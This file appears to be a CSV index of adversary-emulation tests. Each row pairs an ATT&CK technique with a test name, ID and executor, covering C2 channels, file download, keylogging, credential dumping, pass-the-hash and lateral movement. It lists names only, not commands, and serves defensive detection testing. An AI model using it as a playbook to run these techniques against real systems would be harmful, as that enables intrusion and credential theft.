persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
persistence,T1574.012,Hijack Execution Flow: COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,Base64 Encoded data (freebsd),2d97c626-7652-449e-a986-b02d9051c298,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,3,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,4,DNS C2,e7bf9802-2e78-4db9-93b5-181b7bcd37d7,powershell
command-and-control,T1071,Application Layer Protocol,1,Telnet C2,3b0df731-030c-4768-b492-2a3216d90e53,powershell
command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell
command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
command-and-control,T1219,Remote Access Software,11,MSP360 Connect Execution,b1b8128b-c5d4-4de9-bf70-e60419274562,powershell
command-and-control,T1219,Remote Access Software,12,RustDesk Files Detected Test on Windows,f1641ba9-919a-4323-b74f-33372333bf0e,powershell
command-and-control,T1219,Remote Access Software,13,Splashtop Execution,b025c580-029e-4023-888d-a42710d76934,powershell
command-and-control,T1219,Remote Access Software,14,Splashtop Streamer Execution,3e1858ee-3550-401c-86ec-5e70ed79295b,powershell
command-and-control,T1219,Remote Access Software,15,Microsoft App Quick Assist Execution,1aea6d15-70f1-4b4e-8b02-397b5d5ffe75,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
command-and-control,T1572,Protocol Tunneling,4,run ngrok,4cdc9fc7-53fb-4894-9f0c-64836943ea60,powershell
command-and-control,T1572,Protocol Tunneling,5,Microsoft Dev tunnels (Linux/macOS),9f94a112-1ce2-464d-a63b-83c1f465f801,bash
command-and-control,T1572,Protocol Tunneling,6,VSCode tunnels (Linux/macOS),b877943f-0377-44f4-8477-f79db7f07c4d,sh
command-and-control,T1572,Protocol Tunneling,7,Cloudflare tunnels (Linux/macOS),228c336a-2f79-4043-8aef-bfa453a611d5,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu/FreeBSD,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8-3ac259964003,powershell
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
command-and-control,T1095,Non-Application Layer Protocol,4,Linux ICMP Reverse Shell using icmp-cnc,8e139e1f-1f3a-4be7-901d-afae9738c064,manual
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,sh
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,sh
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,sh
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,sh
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,sh
command-and-control,T1105,Ingress Tool Transfer,7,certutil download (urlcache),dd3b61dd-7bbc-48cd-ab51-49ad1a776df0,command_prompt
command-and-control,T1105,Ingress Tool Transfer,8,certutil download (verifyctl),ffd492e3-0455-4518-9fb1-46527c9f241b,powershell
command-and-control,T1105,Ingress Tool Transfer,9,Windows - BITSAdmin BITS Download,a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download,42dc4460-9aa6-45d3-b1a6-3955d34e1fe8,powershell
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell
command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf,powershell
command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
command-and-control,T1105,Ingress Tool Transfer,30,Arbitrary file download using the Notepad++ GUP.exe binary,66ee226e-64cb-4dae-80e3-5bf5763e4a51,command_prompt
command-and-control,T1105,Ingress Tool Transfer,31,File download via nscurl,5bcefe5f-3f30-4f1c-a61a-8d7db3f4450c,sh
command-and-control,T1105,Ingress Tool Transfer,32,File Download with Sqlcmd.exe,6934c16e-0b3a-4e7f-ab8c-c414acd32181,powershell
command-and-control,T1105,Ingress Tool Transfer,33,Remote File Copy using PSCP,c82b1e60-c549-406f-9b00-0a8ae31c9cfe,command_prompt
command-and-control,T1105,Ingress Tool Transfer,34,Windows push file using scp.exe,2a4b0d29-e5dd-4b66-b729-07423ba1cd9d,powershell
command-and-control,T1105,Ingress Tool Transfer,35,Windows pull file using scp.exe,401667dc-05a6-4da0-a2a7-acfe4819559c,powershell
command-and-control,T1105,Ingress Tool Transfer,36,Windows push file using sftp.exe,205e676e-0401-4bae-83a5-94b8c5daeb22,powershell
command-and-control,T1105,Ingress Tool Transfer,37,Windows pull file using sftp.exe,3d25f1f2-55cb-4a41-a523-d17ad4cfba19,powershell
command-and-control,T1105,Ingress Tool Transfer,38,Download a file with OneDrive Standalone Updater,3dd6a6cf-9c78-462c-bd75-e9b54fc8925b,powershell
command-and-control,T1105,Ingress Tool Transfer,39,Curl Insecure Connection from a Pod,7e2ad0db-1efa-4af2-a77c-bc6e87d7b3f3,bash
command-and-control,T1001.002,Data Obfuscation via Steganography,1,Steganographic Tarball Embedding,c7921449-8b62-4c4d-8a83-d9281ac0190b,powershell
command-and-control,T1001.002,Data Obfuscation via Steganography,2,Embedded Script in Image Execution via Extract-Invoke-PSImage,04bb8e3d-1670-46ab-a3f1-5cee64da29b6,powershell
command-and-control,T1001.002,Data Obfuscation via Steganography,3,Execute Embedded Script in Image via Steganography,4ff61684-ad91-405c-9fbc-048354ff1d07,sh
command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Proxy: Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
collection,T1560.001,Archive Collected Data: Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,bash
collection,T1560.001,Archive Collected Data: Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1560.001,Archive Collected Data: Archive via Utility,9,Encrypts collected data with AES-256 and Base64,a743e3a6-e8b2-4a30-abe7-ca85d201b5d3,bash
collection,T1560.001,Archive Collected Data: Archive via Utility,10,ESXi - Remove Syslog remote IP,36c62584-d360-41d6-886f-d194654be7c2,powershell
collection,T1560.001,Archive Collected Data: Archive via Utility,11,Compress a File for Exfiltration using Makecab,2a7bc405-9555-4f49-ace2-b2ae2941d629,command_prompt
collection,T1560.001,Archive Collected Data: Archive via Utility,12,Copy and Compress AppData Folder,05e8942e-f04f-460a-b560-f7781257feec,powershell
collection,T1113,Screen Capture,1,Screencapture,0f47ceb1-720f-4275-96b8-21f0562217ac,bash
collection,T1113,Screen Capture,2,Screencapture (silent),deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,X Windows Capture (freebsd),562f3bc2-74e8-46c5-95c7-0e01f9ccc65c,sh
collection,T1113,Screen Capture,5,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
collection,T1113,Screen Capture,6,Capture Linux Desktop using Import Tool (freebsd),18397d87-38aa-4443-a098-8a48a8ca5d8d,sh
collection,T1113,Screen Capture,7,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell
collection,T1113,Screen Capture,8,Windows Screen Capture (CopyFromScreen),e9313014-985a-48ef-80d9-cde604ffc187,powershell
collection,T1113,Screen Capture,9,Windows Recall Feature Enabled - DisableAIDataAnalysis Value Deleted,5a496325-0115-4274-8eb9-755b649ad0fb,powershell
collection,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
collection,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
collection,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh
collection,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
collection,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
collection,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell
collection,T1123,Audio Capture,2,Registry artefact when application use microphone,7a21cce2-6ada-4f7c-afd9-e1e9c481e44a,command_prompt
collection,T1123,Audio Capture,3,using Quicktime Player,c7a0bb71-70ce-4a53-b115-881f241b795b,sh
collection,T1025,Data from Removable Media,1,Identify Documents on USB and Removable Media via PowerShell,0b29f7e3-a050-44b7-bf05-9fb86af1ec2e,command_prompt
collection,T1074.001,Data Staged: Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell
collection,T1074.001,Data Staged: Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,sh
collection,T1074.001,Data Staged: Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell
collection,T1114.001,Email Collection: Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell
collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt
collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell
collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell
collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt
collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt
collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell
collection,T1115,Clipboard Data,3,Execute commands from clipboard,1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff,bash
collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell
collection,T1115,Clipboard Data,5,Add or copy content to clipboard with xClip,ee363e53-b083-4230-aff3-f8d955f2d5bb,sh
collection,T1530,Data from Cloud Storage Object,1,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
collection,T1530,Data from Cloud Storage Object,2,Azure - Dump Azure Storage Account Objects via Azure CLI,67374845-b4c8-4204-adcc-9b217b65d4f1,powershell
collection,T1005,Data from Local System,1,Search files of interest and save them to a single zip file (Windows),d3d9af44-b8ad-4375-8b0a-4bff4b7e419c,powershell
collection,T1005,Data from Local System,2,Find and dump sqlite databases (Linux),00cbb875-7ae4-4cf1-b638-e543fd825300,bash
collection,T1005,Data from Local System,3,Copy Apple Notes database files using AppleScript,cfb6d400-a269-4c06-a347-6d88d584d5f7,sh
collection,T1560.002,Archive Collected Data: Archive via Library,1,Compressing data using GZip in Python (FreeBSD/Linux),391f5298-b12d-4636-8482-35d9c17d53a8,sh
collection,T1560.002,Archive Collected Data: Archive via Library,2,Compressing data using bz2 in Python (FreeBSD/Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,sh
collection,T1560.002,Archive Collected Data: Archive via Library,3,Compressing data using zipfile in Python (FreeBSD/Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,sh
collection,T1560.002,Archive Collected Data: Archive via Library,4,Compressing data using tarfile in Python (FreeBSD/Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,sh
collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
collection,T1557.001,Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
collection,T1125,Video Capture,1,Registry artefact when application use webcam,6581e4a7-42e3-43c5-a0d2-5a0d62f9702a,command_prompt
collection,T1114.003,Email Collection: Email Forwarding Rule,1,Office365 - Email Forwarding,3234117e-151d-4254-9150-3d0bac41e38c,powershell
collection,T1056.002,Input Capture: GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
collection,T1056.002,Input Capture: GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
collection,T1056.002,Input Capture: GUI Input Capture,3,AppleScript - Spoofing a credential prompt using osascript,b7037b89-947a-427a-ba29-e7e9f09bc045,bash
collection,T1039,Data from Network Shared Drive,1,Copy a sensitive File over Administrative share with copy,6ed67921-1774-44ba-bac6-adb51ed60660,command_prompt
collection,T1039,Data from Network Shared Drive,2,Copy a sensitive File over Administrative share with Powershell,7762e120-5879-44ff-97f8-008b401b9a98,powershell
collection,T1114.002,Email Collection: Remote Email Collection,1,Office365 - Remote Mail Collected,36657d95-d9d6-4fbf-8a31-f4085607bafd,powershell
collection,T1056.004,Input Capture: Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
lateral-movement,T1021.005,Remote Services:VNC,1,Enable Apple Remote Desktop Agent,8a930abe-841c-4d4f-a877-72e9fe90b9ea,sh
lateral-movement,T1021.004,Remote Services: SSH,1,ESXi - Enable SSH via PowerCLI,8f6c14d1-f13d-4616-b7fc-98cc69fe56ec,powershell
lateral-movement,T1021.004,Remote Services: SSH,2,ESXi - Enable SSH via VIM-CMD,280812c8-4dae-43e9-a74e-1d08ab997c0e,command_prompt
lateral-movement,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,1,Map admin share,3386975b-367a-4fbb-9d77-4dcf3639ffd3,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
lateral-movement,T1021.002,Remote Services: SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
lateral-movement,T1021.006,Remote Services: Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,2,Remote Code Execution with PS Credentials Using Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
lateral-movement,T1021.006,Remote Services: Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
lateral-movement,T1021.003,Remote Services: Distributed Component Object Model,1,PowerShell Lateral Movement using MMC20,6dc74eb1-c9d6-4c53-b3b5-6f50ae339673,powershell
lateral-movement,T1021.003,Remote Services: Distributed Component Object Model,2,PowerShell Lateral Movement Using Excel Application Object,505f24be-1c11-4694-b614-e01ae1cd2570,powershell
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
lateral-movement,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
lateral-movement,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
lateral-movement,T1072,Software Deployment Tools,3,Deploy 7-Zip Using Chocolatey,2169e8b0-2ee7-44cb-8a6e-d816a5db7d8a,powershell
lateral-movement,T1570,Lateral Tool Transfer,1,Exfiltration Over SMB over QUIC (New-SmbMapping),d8d13303-159e-4f33-89f4-9f07812d016f,powershell
lateral-movement,T1570,Lateral Tool Transfer,2,Exfiltration Over SMB over QUIC (NET USE),183235ca-8e6c-422c-88c2-3aa28c4825d9,powershell
lateral-movement,T1563.002,Remote Service Session Hijacking: RDP Hijacking,1,RDP hijacking,a37ac520-b911-458e-8aed-c5f1576d9f46,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,1,Mimikatz Pass the Hash,ec23cef9-27d9-46e4-a68d-6f75f7b86908,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,2,crackmapexec Pass the Hash,eb05b028-16c8-4ad8-adea-6f5b219da9a9,command_prompt
lateral-movement,T1550.002,Use Alternate Authentication Material: Pass the Hash,3,Invoke-WMIExec Pass the Hash,f8757545-b00a-4e4e-8cfb-8cfb961ee713,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,1,RDP to DomainController,355d4632-8cb9-449d-91ce-b566d0253d3e,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,2,Changing RDP Port to Non Standard Port via Powershell,2f840dd4-8a2e-4f44-beb3-6b2399ea3771,powershell
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing RDP Port to Non Standard Port via Command_Prompt,74ace21e-a31c-4f7d-b540-53e4eb6d1f73,command_prompt
lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,4,Disable NLA for RDP via Command Prompt,01d1c6c0-faf0-408e-b368-752a02285cb2,command_prompt
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,2,Malicious PAM rule (freebsd),b17eacac-282d-4ca8-a240-46602cf863e3,sh
credential-access,T1556.003,Modify Authentication Process: Pluggable Authentication Modules,3,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
credential-access,T1056.001,Input Capture: Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
credential-access,T1056.001,Input Capture: Keylogging,4,Logging sh history to syslog/messages,b04284dc-3bd9-4840-8d21-61b8d31c99f2,sh
credential-access,T1056.001,Input Capture: Keylogging,5,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,bash
credential-access,T1056.001,Input Capture: Keylogging,6,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Input Capture: Keylogging,7,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1056.001,Input Capture: Keylogging,8,MacOS Swift Keylogger,aee3a097-4c5c-4fff-bbd3-0a705867ae29,bash
credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt
credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell
credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell
credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash
credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash
credential-access,T1110.001,Brute Force: Password Guessing,7,SUDO Brute Force - FreeBSD,abcde488-e083-4ee7-bc85-a5684edd7541,bash
credential-access,T1110.001,Brute Force: Password Guessing,8,ESXi - Brute Force Until Account Lockout,ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5,powershell
credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
credential-access,T1003,OS Credential Dumping,4,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),6c7a4fd3-5b0b-4b30-a93e-39411b25d889,powershell
